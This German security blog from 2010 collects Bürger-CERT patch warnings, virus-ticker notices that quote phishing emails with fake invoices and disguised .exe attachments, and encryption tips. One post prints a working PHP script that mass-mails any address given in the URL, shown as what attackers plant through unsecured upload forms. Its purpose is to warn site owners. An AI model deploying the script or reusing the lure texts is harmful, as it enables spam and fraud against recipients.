Seiten

Posts mit dem Label cryptographie werden angezeigt. Alle Posts anzeigen
Posts mit dem Label cryptographie werden angezeigt. Alle Posts anzeigen

Samstag, 11. September 2010

Mal ein kleiner Test für die Sicherheit

Ich probier mal was und das ist die Sicherheit im Internet zu erhöhen indem ich Sicherheitswarnungen von anderen hier in meinem Blog mit veröffentliche. Ich nehme an, daß durch die Einbindung des RSS-Feeds vom Blog in anderen Webseiten und die RSS-Feed Abos diese wichtigen Sicherheitsinformationen besser verbreitet werden und das Netz dadurch sicherer wird.

Meine Absicht ist es:
Die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI) und die eMail - Virenmeldungen des Viren - Tickers in Monaten zusammengefasst zu posten.
...
Noch ne wichtige Anmerkung:
Sämtliche Sicherheitsmeldungen bedeuten nicht, daß die Konkurrenzprodukte deshalb sicherer sind. Tatsächlich bedeuten diese Meldungen nur, daß hier etwas für die Sicherheit getan und nicht darüber geschwiegen wurde, bis die ganze Cyberwelt es heraus schreit!

Es folgen die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI)


Zusammenfassung der Technischen Warnungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.buerger-cert.de
-----------------------------------------------------------------------
Sicherheitsupdate fuer Adobe Flash Player [Bcert-2010-0093/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0093
-----------------------------------------------------------------------
Microsoft Patchday September 2010 [Bcert-2010-0094/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0094
-----------------------------------------------------------------------
Apple Mac OS X Sicherheitsupdate 2010-006 [Bcert-2010-0095/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0095
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Apple QuickTime Player 7.6.8 [Bcert-2010-0092/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0092
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
[Bcert-2010-0088/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0088
-----------------------------------------------------------------------
Apple Safari Safari 5.0.2 and Safari 4.1.2 [Bcert-2010-0089/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0089
-----------------------------------------------------------------------
Apple iPhone und iPod Touch [Bcert-2010-0090/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0090
-----------------------------------------------------------------------
Adobe Reader und Acrobat 9.3.4 [Bcert-2010-0091/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0091
-----------------------------------------------------------------------
Mal sehen ob was nützliches dabei herauskommt?


Technische Warnungen des Buerger-CERT
[Bcert-2010-0093/1]:
Sicherheitsupdate fuer Adobe Flash Player

Risiko: Hoch

Betroffene Systeme:
Adobe Flash Player Version 10.1.82.76 und frueher fuer Windows, Macintosh, Linux und Solaris
Adobe Flash Player Version 10.1.92.10 und frueher fuer Android
Adobe Flash Player vor Version 9.0.283

Empfehlung:
Das Buerger-CERT empfiehlt die zeitnahe Aktualisierung des Adobe Flash Players (10.1.85.3 fuer Windows, Macintosh. Linux und Solaris bzw. 10.1.95.1 fuer Android) fuer den jeweils genutzten Browser. Bei dem Adobe Flash Player geschieht dies am einfachsten ueber die integrierte Update-Funktion oder ueber die Webseite
http://get.adobe.com/flashplayer/
Anwender des Flash Players fuer Android Version 10.1.92.10 und frueher koennen die Aktualisierung ueber den Android Marketplace durchfuehren.
Adobe bietet eine Webseite [2] zur Pruefung der aktuell installierten Flash Player Version an. Bei dem Einsatz mehrerer Browser sollte die Pruefung fuer jeden einzelnen Browser durchgefuehrt werden.
Fuer Anwender, die nicht auf Flash Player 10.1.85.3 aktualisieren koennen, stellt Adobe eine aktualisierte Flash Player Version 9.0.283 bereit [3].

Beschreibung:
Adobe behebt mit dem Sicherheitsupdate fuer den Flash Player eine kritische Schwachstelle, die es einem Angreifer ermoeglicht, beliebigen Code auf betroffenen Systemen auszufuehren. Hierfuer reicht bereits der Besuch einer vom Angreifer praeparierten Webseite.
[Bcert-2010-0088/1]:
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey

Risiko: Hoch

Betroffene Systeme:
Mozilla Firefox vor Version 3.6.9
Mozilla Firefox vor Version 3.5.12
Mozilla Thunderbird vor Version 3.1.3
Mozilla Thunderbird vor Version 3.0.7
SeaMonkey vor Version 2.0.7

Empfehlung:
Das Buerger-CERT empfiehlt Nutzern des Webbrowsers Firefox und des E-Mail-Clients Thunderbird die von ihnen genutzte Versionsreihe zu aktualisieren. Der Support der Firefox-Versionsreihe 3.5 ist ausgelaufen.
Am einfachsten ist ein Update ueber die integrierte Update-Funktion moeglich:
Menue "Hilfe", "Nach Updates suchen..." bzw. "Firefox/Thunderbird aktualisieren".
Alternativ stehen die Installationspakete auf folgenden Webseiten zum Herunterladen bereit:
Firefox 3.6.9
http://www.mozilla.com/de/
Firefox 3.5.12
http://www.mozilla.com/en-US/firefox/all-older.html
Thunderbird 3.1.3
http://www.mozillamessaging.com/de/
Thunderbird 3.0.7
http://www.mozillamessaging.com/en-US/thunderbird/all-older.html
SeaMonkey 2.0.7
http://www.seamonkey-project.org/releases/

Beschreibung:
Ein Angreifer kann die von den Mozilla-Entwicklern in Firefox und Thunderbird geschlossenen Schwachstellen ausnutzen, um Informationen auszuspaehen, einen Absturz der Anwendung auszuloesen oder beliebigen Code zur Ausfuehrung zu bringen.
[Bcert-2010-0089/1]:
Apple Safari Safari 5.0.2 and Safari 4.1.2

Risiko: Hoch

Betroffene Systeme:
Apple Safari vor Version 5.0.2
Apple Safari vor Version 4.1.2

Empfehlung:
Das Buerger-CERT empfiehlt das von Apple bereitgestellte Safari-Sicherheitsupdate so rasch wie moeglich zu installieren. Dies geschieht unter Mac OS X am einfachsten ueber die integrierte Funktion "Software Aktualisierung" des Betriebssystems bzw. unter Microsoft Windows mit der Anwendung "Apple Software Update".
Alternativ kann das Safari-Update auch manuell von der Apple
Download-Webseite heruntergeladen werden:
http://support.apple.com/downloads/

Beschreibung:
Mit den Safari Versionen 5.0.2 und 4.1.2 schliesst Apple drei Sicherheitsluecken im Browser. Die Ausnutzung der Sicherheitsluecken ermoeglicht einem entfernten Angreifer mithilfe von praeparierten Webseiten u.a. die Ausfuehrung von Schadcode auf dem System des Opfers.
[Bcert-2010-0091/1]:
Adobe Reader und Acrobat 9.3.4

Risiko: Hoch

Betroffene Systeme:
Adobe Reader und Acrobat Version 9.3.4 und frueher

Empfehlung:
Ein Patch des Herstellers steht derzeit nicht zur Verfuegung. Derzeit verwenden die praeparierten PDF-Dokumente zur Ausnutzung dieser Sicherheitsluecke JavaScript. Daher eine Deaktivierung von JavaScript grundsaetzlich sinnvoll.
Dies ist in Adobe Reader und Acrobat ueber das Menue
"Bearbeiten" > "Voreinstellungen..." > Kategorie "JavaScript"
moeglich. Entfernen Sie zur Deaktivierung von JavaScript in PDF-Dokumenten den Haken vor der Option "Acrobat JavaScript aktivieren" und bestaetigen Sie das Fenster mit der Schaltflaeche "OK".
Diese Massnahme bietet allerdings keinen vollstaendigen Schutz vor Ausnutzung der Schwachstelle.

Beschreibung:
Adobe warnt vor einer neuen Sicherheitsluecke im Adobe Reader und Acrobat 9.3.4 sowie frueheren Versionen fuer Windows, Mac und Unix. Die Sicherheitsluecke wird bereits aktiv ausgenutzt, um ueber manipulierte PDF-Dokumente Windows-PCs zu kompromittieren.


Durch eMails verbreitete Viren


Zusammenfassung der Virenmeldungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.viren-ticker.de/

Angeblicher Abbuchungsauftrag versucht einen Trojaner einzuschleusen
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 5.672 Euro hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich kein Abbuchungsauftrag, sondern der heimtückische Trojaner iBill.T, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Leihvertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 140525114897 wurde erfüllt.
Ein Betrag von 5672.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als "Paypalabbuchung " angezeigt.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Wurm tarnt sich als fehlgeleitete E-Mail
Der Wurm Mytob.A wieder unterwegs. Der Wurm versteckt sich im Anhang einer E-Mail, die scheinbar nicht zugestellt werden konnte. Nähere Angaben zu dieser E-Mail können Sie angeblich der im Anhang befindlichen Datei entnehmen. Und das ist natürlich gelogen.
Wird die sich im Anhang befindende Datei durch einen Doppelklick geöffnet, erhält man keine Informationen über die entsprechende E-Mail, die nicht zugestellt werden konnte. Stattdessen installiert sich der Wurm auf dem betreffenden System.
Die E-Mail hat folgendes Aussehen:
Betreff: „Mail Delivery System”
Dateianhang: „body.zip.exe“.
Größe des Dateianhangs: 41.824 Bytes.
E-Mail-Text: „Mail transaction failed. Partial message is available.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Gefahr durch falschen Abbuchungsauftrag
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang stecken natürlich keine Informationen über den Abbuchungsauftrag, sondern der heimtückische Wurm Klez.E7, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Vertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrte Kundin, sehr geehrte Kunde,
Ihr Abbuchungsauftrag wurde erfüllt. Sie finden die Details zu der Rechnung im Anhang.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Wurm lockt mit nackter Fußball-Mannschaft
Der Wurm Soccer.C lockt mit Bildern einer angeblich nackten Fußball-Mannschaft. Im Anhang der E-Mail befinden sich dann wie immer keine Bilder, sondern der Wurm lauert darauf, das betreffende System zu kapern.
Die E-Mail hat folgendes Aussehen:
Betreff: „Naked World Cup game set“
Dateianhang: soccer_nudist.bmp.exe
E-Mail-Text: „Nudists are organising their own tribute to the world cup, by staging their own nude soccer game, though it is not clear how the teams will tell each other apart. Good photos ;)“.
Dateigröße: 39.904 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

E-Mail aus China lockt mit angeblichen Dokument im Anhang
Der Wurm Traxgy.B5 ist unterwegs und verstopft die E-Mail-Postfächer. Im Anhang befindet sich ein angebliches Dokument. Die E-Mail ist leicht zu erkennen, da Betreff und E-Mail-Text aus chinesischen Schriftzeichen bestehen. Im Anhang befindet sich aber eine Datei mit der Bezeichnung Document.
Nach einem Doppelklick auf die im Anhang befindliche Datei, wird jedoch kein Dokument mit dem verknüpften Textverarbeitungsprogramm geöffnet, stattdessen installiert sich der Wurm auf dem System.
Die E-Mail hat folgendes Aussehen:
Betreff: %chinesischer Text%
Dateianhang: Document
Dateierweiterung: .exe
Größe des Dateianhangs: 57.344 Bytes
E-Mail-Text: %chinesischer Text% Document.exe %chinesischer Text%
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Trojaner kommt mit falscher Rechnung von Amazon
Es werden E-Mails versandt, die angeblich von Amazon stammen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 715 Euro für einen bestellten Laptop hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich keine Rechnung, sondern ein heimtückischenr Trojaner, der das betreffende System infiziert.
Die E-Mail hat folgendes Aussehen:
Betreff: „Ihre Bestellung 2984234 bei Amazon.de“.
Dateianhang: „Rechnung.doc.zip“
E-Mail-Text: „Vielen Dank für Ihre Bestellung bei Amazon.de!
Das Sony VAIO Notebook wird in Kürze versendet. Die Kosten von 715,- Euro werden Ihrem Konto zu Last gelegt. Die Einzelheiten zu Ihrer Bestellung entnehmen Sie bitte der angefügten Rechnung. Falls Sie die Bestellung stornieren möchte, bitte den in der Rechnung angegebenen Kundenservice anrufen und Ihre Bestellnummer bereithalten. Eine Kopie der Rechnung wird Ihnen in den nächsten Tagen schriftlich zugestellt.
Virus: Dldr.iBill.Z
Virustyp: Trojaner
Dateigröße: 12.800 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Gefälschter Office-Patch versucht Ihr System zu kapern
Der Trojaner Badware12 ist unterwegs und versucht Anwendern ein falsches Microsoft Office-Update vorzugaukeln. Die E-Mail ist angeblich vom Onlinedienst MSN und enthält ein Update für Office 2007. Das ist natürlich gelogen: Wer dem Link in der E-Mail folgt, erhält kein Update, sondern einen gefährlichen Trojaner untergeschoben.
Die E-Mail hat folgendes Aussehen:
Betreff: „Update for Office 2007 only“
E-Mail-Text: unterschiedlicher Text
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»

Dienstag, 7. September 2010

Mit Dateiuploads sich den Tag versauen

Wir haben schon auf allen möglichen Websites darauf hingewiesen, Dateiuploadmöglichkeiten genügend abzusichern. folgende kleines Snippet soll zeigen, wie stinkeinfach es ist eine WebSite mit Dateiupload als Spam und Virenschleuder zu verwenden.

$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];

for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>

Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.

Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha

Sonntag, 11. Juli 2010

Hacker Bibel Teil 2

Hacker Bibel Teil 2

Die Hacker Bibel Teil 1

Die Hacker Bibel Teil 1

Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE

Internet-Telefonie gilt als abhörsicherer als Festnetz-Telefone oder die zurecht als "Wanze in der Tasche" gescholtenen Handys. Doch absolute Sicherheit gibt es nicht: Jetzt gelang es einem US-Hacker, die Verschlüsselung des populären Skype-Dienstes zu knacken. Bei Skype hält sich die Begeisterung in Grenzen, doch der Chaos Computer Club lindert den Schmerz indem er die Lücke erst zu Weihnachten auf einem Kongreß offen legt.
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE

Schluss mit der Abzocke im Internet

Alle wollen den Button - warum kommt er nicht?

Die rasche Umsetzung einer nationalen Button-Lösung zur Bekämpfung von Kostenfallen im Internet fordert der Verbraucherzentrale Bundesverband (vzbv). Damit würden die versteckten Kosten bei unseriösen Internetangeboten sichtbar gemacht und der Abzocke von Verbrauchern durch Abofallen endlich Einhalt geboten. In Frankreich gibt es bereits eine Bestätigungslösung, Kostenfallen sind dort kein Thema.


Schaden im Millionenhöhe
Ob Hausaufgabenhilfen, Kochrezepte oder Software: Mit unzähligen vermeintlichen Gratis-Diensten locken unseriöse Anbieter Internetnutzer in eine Kostenfalle. Viele Verbraucher rechnen nicht damit, für Dienste zahlen zu müssen, die es im Internet im Normalfall kostenlos gibt. Im guten Glauben geben sie ihren Namen und ihre Adresse an - und haben ein teures Abo abgeschlossen. Anschließend überziehen die Betreiber Betroffene mit einschüchternden Drohbriefen. Nicht Wenige zahlen aus Angst die haltlosen Forderungen. In Deutschland liegt der Schaden jährlich im mehrstelligen Millionenbereich. Seit Jahren gewinnt der vzbv gegen unseriöse Online-Anbieter ein Verfahren nach dem anderen. Trotzdem nimmt die Abzocke weiter zu, wie die nicht nachlassenden Beschwerdefälle in der Verbraucherberatung zeigen.

Donnerstag, 3. Juni 2010

Datensschutz für unterwegs, ZuHause und bei der Arbeit

Manchmal ist es leider auch notwendig Dateien die dem eigenen Rechner liegen, zu verschlüsseln. Kostenlos und mit staatlicher Sicherheit geht das mit http://www.gpg4win.de/
GPG4Win wurde zumindest irgendwann einmal vor vielen Jahren mit staatlichen Mitteln gefördert!
Mit der Installation des Gpg4Win Pakets hast Du im Kontextmenüs des MS Explorer bei Ordnern und Dateien die Möglichkeit zu verschlüsseln/entschlüsseln/signieren etc.
Zusätzlich und eigentliches Hauptfeature: Du hast die Möglichkeit deinen e@Mail - Verkehr mit installertem Outlook oder Thunderbird wie vom Bundesministerium für Sicherheit in der Informationstechnologie empfohlen, sicher zu gestalten.
Sieht am Anfang alles recht kryptisch aus, funzt nach zwei- bis dreimal ausprobieren aber fast von allein.
Empfehle Dir bei Nutzung mit e@mails Thunderbird und das kostenlose Addin enigmail.
Bei http://www.thunderbird-mail.de/ gibt es passende Links für Downloads und jede Menge Hilfe.
Seriös und kostenlos, und nicht von den vielen Abzockern betrieben, die mit der von anderen kostenlos zur Verfügung gestellten Arbeit jede Menge Knete verdienen.
Eine weitere kostenlose und ausführliche Sammlung von Verschlüsselungsprogrammen findest Du unter http://www.opensource-dvd.de/sicherhe...

Russische Lösung <=> Nettes Gimmick:

Es gibt die Möglichkeit Teile auf Laufwerken oder ganze Laufwerke zu verstecken. Bei der russischen Lösung legst Du in dem versteckten Teil ein weiteres verstecktes Teil an. Im Regelfall werden die meisten sich mit der Erforschung des ersten entdeckten Teils begnügen, dadurch bleibt der Zweite Teil mit den noch brisanteren Daten weiterhin verborgen.
Ich halte die oben genannten Verfahrensweisen am praktischsten und sichersten. Jeder Versuch einer  Verschlüsselung zieht unwilkürlich irgendwo auf der Welt den Versuch nach, den Knoten zu lösen. Und wenn es bei uns in D den Knotenlöser nicht zu finden gibt, weil verboten, dann heißt das noch lange nicht, daß ihn die lieben Nachbarn nicht haben. Für die Erkennung eines einfach verschlüsselten WLANs braucht der beliebteste KeyFinder auf nem normalen Rechner 1-2 Minuten. Bei den obengenannten Programme(n) kannst Du nen normalen Rechner ein paar Jahre beschäftigen, (ist unter anderem in Wikipedia nachzulesen)